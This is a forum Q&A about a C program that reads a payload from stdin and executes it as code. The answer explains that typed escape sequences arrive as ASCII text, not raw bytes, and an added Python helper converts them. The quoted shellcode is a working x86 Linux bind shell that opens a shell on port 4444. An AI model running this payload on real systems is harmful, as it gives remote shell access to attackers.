I have a small C program in my local environment. This program receives a payload and outputs it.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* needed for memset */

int main(int argc, char *argv[])
{
    char buffer[1025];
    memset(buffer, 0, 1025);
    /* read at most 1024 bytes of the payload from stdin */
    fread(buffer, 1, 1024, stdin);
    /* treat the buffer as a function and jump into it */
    int (*f)() = (int (*)())buffer;
    f();
    return 0;
}
I tried passing 1024 characters and then a shellcode, but it doesn't do anything.
I passed "A"x1204 and then the shellcode below:
\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89\xe1\xcd\x80\x52\x43\x68\xff\x02\x11\x5C\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6\xb0\x66\xcd\x80\x43\x43\xb0\x66\xcd\x80\x52\x56\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80
Does anyone have a hint as to what I am doing wrong?
stdin accepts ASCII text, not an escaped C string. The buffer will then contain:
5c 78 36 61 5c 78 36 36 5c 78 35 38 5c 78 36 61 5c 78 30 31 5c 78 35 62 5c 78 39 39 5c 78 35 32 5c 78 35 33 5c 78 36 61 5c 78 30 32 5c 78 38 39 5c 78 65 31 5c 78 63 64 5c 78 38 30 5c 78 35 32 5c 78 34 33 5c 78 36 38 5c 78 66 66 5c 78 30 32 5c 78 31 31 5c 78 35 43 5c 78 38 39 5c 78 65 31 5c 78 36 61 5c 78 31 30 5c 78 35 31 5c 78 35 30 5c 78 38 39 5c 78 65 31 5c 78 38 39 5c 78 63 36 5c 78 62 30 5c 78 36 36 5c 78 63 64 5c 78 38 30 5c 78 34 33 5c 78 34 33 5c 78 62 30 5c 78 36 36 5c 78 63 64 5c 78 38 30 5c 78 35 32 5c 78 35 36 5c 78 38 39 5c 78 65 31 5c 78 34 33 5c 78 62 30 5c 78 36 36 5c 78 63 64 5c 78 38 30 5c 78 38 39 5c 78 64 39 5c 78 38 39 5c 78 63 33 5c 78 62 30 5c 78 33 66 5c 78 34 39 5c 78 63 64 5c 78 38 30 5c 78 34 31 5c 78 65 32 5c 78 66 38 5c 78 35 32 5c 78 36 38 5c 78 36 65 5c 78 32 66 5c 78 37 33 5c 78 36 38 5c 78 36 38 5c 78 32 66 5c 78 32 66 5c 78 36 32 5c 78 36 39 5c 78 38 39 5c 78 65 33 5c 78 35 32 5c 78 35 33 5c 78 38 39 5c 78 65 31 5c 78 62 30 5c 78 30 62 5c 78 63 64 5c 78 38 30
To pass an escaped string as binary data, echo can be used:
echo -n -e "\x6a\x66\x58\x6a\x01\x5b\x99" | ./a.out
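An added example (not part of the question or the answer above) that makes the encoding point concrete: it parses the \xNN text form into raw bytes and hex-dumps what stdin receives when the escaped text is typed verbatim versus when it is unescaped first. The seven-byte sample is the prefix used in the echo command above; the helper names are my own.

```python
import re

# Matches one C-style "\xNN" escape (exactly two hex digits).
ESCAPE_RE = re.compile(r"\\x([0-9a-fA-F]{2})")

# Constructed sample: the first seven escapes from the question's payload.
SAMPLE = r"\x6a\x66\x58\x6a\x01\x5b\x99"


def escaped_to_bytes(text: str) -> bytes:
    """Turn a string of "\\xNN" escapes into the raw bytes they denote.

    Anything that is not a well-formed \\xNN escape is rejected, so a stray
    literal character cannot silently end up in the output.
    """
    out = bytearray()
    pos = 0
    for m in ESCAPE_RE.finditer(text):
        if m.start() != pos:
            raise ValueError(f"unexpected literal text at offset {pos}")
        out.append(int(m.group(1), 16))
        pos = m.end()
    if pos != len(text):
        raise ValueError(f"unexpected literal text at offset {pos}")
    return bytes(out)


def as_typed(text: str) -> bytes:
    """The bytes stdin really receives when the escape text is typed verbatim:
    a backslash (0x5c), an 'x' (0x78) and two ASCII hex digits per escape."""
    return text.encode("ascii")


def hexdump(data: bytes) -> str:
    """Render bytes the way the answer shows the buffer: space-separated hex."""
    return " ".join(f"{b:02x}" for b in data)


if __name__ == "__main__":
    typed = as_typed(SAMPLE)
    raw = escaped_to_bytes(SAMPLE)
    # The typed form is four times longer and starts with "5c 78 ...",
    # exactly the pattern in the answer's dump of the buffer.
    print(f"typed verbatim: {len(typed):3d} bytes -> {hexdump(typed)}")
    print(f"unescaped     : {len(raw):3d} bytes -> {hexdump(raw)}")
```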